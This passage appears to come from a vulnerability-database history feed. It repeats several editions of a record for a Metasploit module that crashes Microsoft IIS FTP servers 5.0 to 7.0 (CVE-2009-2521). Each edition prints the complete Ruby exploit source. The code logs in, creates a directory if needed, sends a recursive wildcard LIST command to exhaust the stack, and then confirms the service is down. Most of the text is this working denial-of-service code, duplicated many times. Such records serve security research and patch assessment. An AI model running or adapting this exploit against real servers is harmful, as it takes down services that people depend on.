there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-03-10T09:06:28", "differentElements": ["modified", "published"], "edition": 39}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-03-20T10:00:17", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 4.0, "modified": "2018-03-20T10:00:17", "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-03-20T10:00:17", "differentElements": ["modified", "published"], "edition": 40}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-03-20T22:00:58", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 4.0, "modified": "2018-03-20T22:00:58", "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-03-20T22:00:58", "differentElements": ["modified", "published"], "edition": 41}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-04-11T10:21:21", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 4.0, "modified": "2018-04-11T10:21:21", "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-04-11T10:21:21", "differentElements": ["modified", "published"], "edition": 42}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-04-11T12:21:21", "history": [], "viewCount": 63, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-04-11T12:21:21", "differentElements": ["modified", "published"], "edition": 43}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-08-25T13:36:48", "history": [], "viewCount": 63, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-08-25T13:36:48", "differentElements": ["modified", "published"], "edition": 44}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-08-25T19:36:43", "history": [], "viewCount": 65, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = 